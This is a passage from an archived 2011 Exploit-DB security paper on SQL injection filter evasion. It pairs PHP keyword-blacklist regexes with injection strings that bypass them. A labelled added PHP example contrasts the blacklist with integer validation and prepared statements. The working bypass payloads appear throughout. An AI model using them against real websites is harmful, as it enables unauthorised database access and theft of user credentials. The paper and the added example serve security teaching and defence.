2016/9/5 Vulnerability analysis, Security Papers, Exploit Tutorials - Part 17934
https://www.exploit-db.com/papers/17934/ 1/20
Beyond SQLi: Obfuscate and Bypass
Archived security papers and articles in various languages.
|=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Beyond SQLi: Obfuscate and Bypass
Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan"
Team : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Date : 2011-10-06
##########
Contents
##########
[0x00] - Introduction
[0x01] - Filter Evasion (Mysql)
  [0x01a] - Bypass Functions and Keywords Filtering
  [0x01b] - Bypass Regular Expression Filtering
[0x02] - Normally Bypassing Techniques
[0x03] - Advanced Bypassing Techniques
  [0x03a] - HTTP Parameter Pollution: Split and Join
  [0x03b] - HTTP Parameter Contamination
[0x04] - How to protect your website
[0x05] - Conclusion
[0x06] - References
[0x07] - Greetz To
#######################
[0x00] - Introduction
#######################
Welcome readers. This paper is a long attempt at documenting the
advanced SQL injection techniques we have been working on. It discloses
advanced bypassing and obfuscation techniques, many of which can be
used against real CMSs and WAFs. The SQL injection statements proposed
in this paper are just some of the ways to bypass the protection.
There are still some other techniques that can be used to attack web
applications, but unfortunately we cannot tell you about them right
now, as they are kept as a 0-day attack. However, this paper aims to
show that there is no completely secure system in the real world, even
if you spend more than 300,000 USD on a WAF.
This paper is divided into 7 sections, but only sections 0x01 to 0x03
contain technical information.
In section 0x01, we give details of how to bypass filters, including
basic, function and keyword filtering.
In section 0x02, we offer normal bypassing techniques for open-source
and commercial WAFs.
In section 0x03, we discuss advanced bypassing techniques in depth,
split into 2 parts: "HTTP Parameter Contamination" and "HTTP Pollution:
Split and Join".
In section 0x04, we give guidance on protecting your own website with
the right solution.
Finally, section 0x05 is the conclusion drawn from sections 0x01-0x04.
#################################
[0x01] - Filter Evasion (Mysql)
#################################
This section describes filter evasion behaviors based on PHP and MySQL
and how to bypass the filtering. The filtering in question is a
technique used to prevent SQL injection attacks; it can be done by
filtering SQL functions and keywords or by using regular expressions.
This means that filter evasion relies heavily on how strong the black
list or regular expression is. If the black list or regular expression
does not cover every injection scenario, the web application is still
vulnerable to SQL Injection attacks.
+++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01a] - Bypass Functions and Keywords Filtering
+++++++++++++++++++++++++++++++++++++++++++++++++++
Functions and keywords filtering protects web applications from attack
by using a black list of functions and keywords. If an attacker submits
injection code containing a keyword or SQL function in the black list,
the injection will be unsuccessful.
However, if the attacker is able to rewrite the injection using another
keyword or function, the black list will fail to prevent the attack. To
prevent attacks, a number of keywords and functions have to be put into
the black list. However, this affects users who want to submit input
containing a word in the black list: they will be unable to submit the
input because it is filtered by the black list. The following scenarios
show cases of functions and keywords filtering and the corresponding
bypassing techniques.
Keyword filter: and, or
----------------------------------------------------------------------
PHP filter code:
preg_match('/(and|or)/i', $id)
The keywords and, or are usually used as a simple test to determine
whether a web application is vulnerable to SQL Injection attacks. Here
is a simple bypass using &&, || instead of and, or respectively.
Filtered injection: 1 or 1 = 1
                    1 and 1 = 1
Bypassed injection: 1 || 1 = 1
                    1 && 1 = 1
----------------------------------------------------------------------
Keyword filter: and, or, union
----------------------------------------------------------------------
PHP filter code:
preg_match('/(and|or|union)/i', $id)
The keyword union is generally used to generate a malicious statement
in order to select extra data from the database.
Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'
** Remark: you have to know the table name, the column name and some
data in the table; otherwise you have to get them from the
information_schema.columns table using another statement, e.g. use the
substring function to get each character of the table names.
----------------------------------------------------------------------
Keyword filter: and, or, union, where
----------------------------------------------------------------------
PHP filter code:
preg_match('/(and|or|union|where)/i', $id)
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'
----------------------------------------------------------------------
Keyword filter: and, or, union, where, limit
----------------------------------------------------------------------
PHP filter code:
preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
----------------------------------------------------------------------
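Added example (not part of the original paper): the filter from the scenario above, next to integer validation and a bound parameter, run over two inputs taken from this page and two legitimate values. It assumes the pdo_sqlite extension; an in-memory SQLite database stands in for MySQL, and the table, its rows and the function names blacklist_blocks and lookup_user are constructed for illustration.

```php
<?php
// Added example: the page's blacklist versus typed validation plus a
// bound parameter. SQLite in memory stands in for MySQL (assumption);
// the table and its rows are constructed sample data.

function blacklist_blocks(string $id): bool {
    // Filter code from the scenario above.
    return preg_match('/(and|or|union|where|limit)/i', $id) === 1;
}

function lookup_user(PDO $db, string $id): ?string {
    // 1) Type check: user_id is a positive integer, accept nothing else.
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return null;
    }
    // 2) Bound parameter: the value is sent as data, never parsed as SQL.
    $stmt = $db->prepare('SELECT user FROM users WHERE user_id = ?');
    $stmt->execute([$n]);
    $row = $stmt->fetchColumn();
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'admin'), (2, 'orlando')");

$inputs = [
    '1',           // legitimate id
    'Orlando',     // legitimate text that contains "or" and "and"
    '1 || 1 = 1',  // from the page: contains no blacklisted keyword
    // from the page: passes the and|or|union|where|limit filter
    "1 || (select user from users group by user_id having user_id = 1) = 'admin'",
];

// Columns: blacklist verdict, result of the hardened lookup, input.
foreach ($inputs as $in) {
    printf("%-6s %-8s %s\n",
        blacklist_blocks($in) ? 'BLOCK' : 'pass',
        var_export(lookup_user($db, $in), true),
        $in);
}
```

The blacklist blocks only the legitimate value "Orlando" and lets both injection strings through, while the hardened lookup returns a row only for the input "1".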
Keyword filter: and, or, union, where, limit, group by
----------------------------------------------------------------------
PHP filter code:
preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'